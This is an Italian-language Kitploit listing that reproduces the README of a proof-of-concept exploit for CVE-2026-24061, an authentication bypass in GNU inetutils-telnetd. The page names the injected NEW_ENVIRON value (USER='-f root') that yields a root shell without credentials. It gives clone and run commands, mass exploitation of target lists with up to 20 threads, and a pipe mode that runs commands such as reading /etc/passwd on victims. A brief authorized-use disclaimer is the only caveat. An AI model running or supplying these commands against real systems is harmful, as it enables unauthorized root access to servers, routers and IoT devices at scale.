Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-24061-PoC-Exploit — Exploit di bypass dell'autenticazione remota per GNU inetutils-telnetd (CVE-2026-24061) che utilizza l'iniezione CRLF per ottenere istantaneamente una shell di root. Supporta sfruttamento singolo/massivo, multi-threading, porte personalizzate, modalità pipe e keep-alive della sessione. | Kitploit
Strumenti/GitHubGitHub/tc4dy/cve-2026-24061-poc-exploit
Analisi delle VulnerabilitàExploitPenetration TestingCommand and ControlStrumento di Accesso RemotoSviluppo Payload
GitHubtc4dy/cve-2026-24061-poc-exploit

CVE-2026-24061-PoC-Exploit

Vedi Repository
644 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Exploit di bypass dell'autenticazione remota per GNU inetutils-telnetd (CVE-2026-24061) che utilizza l'iniezione CRLF per ottenere istantaneamente una shell di root. Supporta sfruttamento singolo/massivo, multi-threading, porte personalizzate, modalità pipe e keep-alive della sessione.

Condividi

CVE-2026-24061

🚀 CVE-2026-24061 - Exploit di Bypass dell'Autenticazione per GNU inetutils-telnetd

Python Bash License CVSS

Edizione GNU inetutils-telnetd - Iniezione CRLF per Bypass dell'Autenticazione e Root Shell Immediata

📌 Panoramica

Questo exploit sfrutta CVE-2026-24061, una vulnerabilità critica di bypass dell'autenticazione remota in GNU inetutils-telnetd. Iniettando un payload NEW_ENVIRON opportunamente modificato con USER='-f root', aggira l'autenticazione e fornisce una root shell immediata senza alcuna credenziale.

Nota: Lo script basic_exploit.sh è una versione semplificata e più veloce di exploit.sh; tuttavia, per la piena funzionalità si consiglia exploit.sh.

🔥 Caratteristiche Principali

CategoriaFunzionalità
Sfruttamento✅ Bypass dell'Autenticazione tramite Iniezione CRLF
✅ Root Shell Immediata
✅ Iniezione Utente Personalizzata (-f admin, -f user)
Scansione✅ Sfruttamento di un Singolo Bersaglio
✅ Sfruttamento di Massa da File
✅ Multi-Threading (thread configurabili)
✅ Supporto Porta Personalizzata
Avanzate✅ Modalità Pipe (esecuzione comandi tramite stdin)
✅ Keep-Alive della Sessione
✅ Meccanismo di Retry
✅ Controllo Timeout
Usabilità✅ Output Colorato (colorama)
✅ Doppio Linguaggio (Python & Bash)
✅ Modalità Verbose/Debug

🎯 Versioni Vulnerabili

ProdottoVersioni
GNU inetutils-telnetd1.9.3 - 2.7
Distribuzioni Linux interessateDebian, CentOS, Ubuntu e le loro distribuzioni derivate. (Zorin OS, Linux Mint, Pop!_OS ed Elementary OS)
Dispositivi EmbeddedNAS, IoT, Router

⚠️ Disclaimer: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a fini educativi. L'accesso non autorizzato è illegale.

📦 Installazione

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit
cd CVE-2026-24061-PoC-Exploit

# Python version
pip3 install -r requirements.txt

# Bash version
chmod +x exploit.sh
chmod +x basic_exploit.sh

🛠️ Esempi di Utilizzo

🎯 Sfruttamento di un Singolo Bersaglio

root@kitploit:~
# Python version
python3 exploit.py -u 192.168.1.100

# Bash version
./exploit.sh -u 192.168.1.100
./basic_exploit.sh 192.168.1.100

🔧 Porta e Utente Personalizzati

root@kitploit:~
# Custom port (non-standard telnet port)
python3 exploit.py -u 10.0.0.5 -p 2323

# Custom username injection
python3 exploit.py -u 10.0.0.5 -usr admin

📊 Sfruttamento di Massa (Multi-Bersaglio)

root@kitploit:~
# Create targets file
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt
echo "10.0.0.5:2323" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt -m 20

# Bash version
./exploit.sh -l targets.txt -m 20

📡 Modalità Pipe (Esecuzione Comandi)

root@kitploit:~
# Execute commands via pipe
echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100

# Multiple commands
echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100

⚙️ Opzioni Avanzate

root@kitploit:~
# Verbose mode with debug output
python3 exploit.py -u 192.168.1.100 -v

# Custom timeout and retries
python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5

# Session keep-alive (maintain shell)
python3 exploit.py -u 192.168.1.100 --keep-alive

📊 Argomenti della Riga di Comando

BreveLungoDescrizioneDefault
-u--urlIndirizzo IP del bersaglioObbligatorio
-p--portPorta del bersaglio23
-l--listFile contenente l'elenco dei bersagliNessuno
-m--max-threadsNumero massimo di thread per lo sfruttamento di massa10
-usr--usernameNome utente da iniettareroot
-t--timeoutTimeout del socket (secondi)10
-r--retriesNumero di tentativi di retry3
-v--verboseAbilita output di debugFalse
--keep-aliveMantieni la sessione attiva dopo lo sfruttamentoFalse

🔗 Exploit Correlati

Dai un'occhiata agli altri miei repository di exploit:

  • CVE-2026-41940
  • CVE-2026-0073
  • CVE-2026-29000
Scarica lo strumento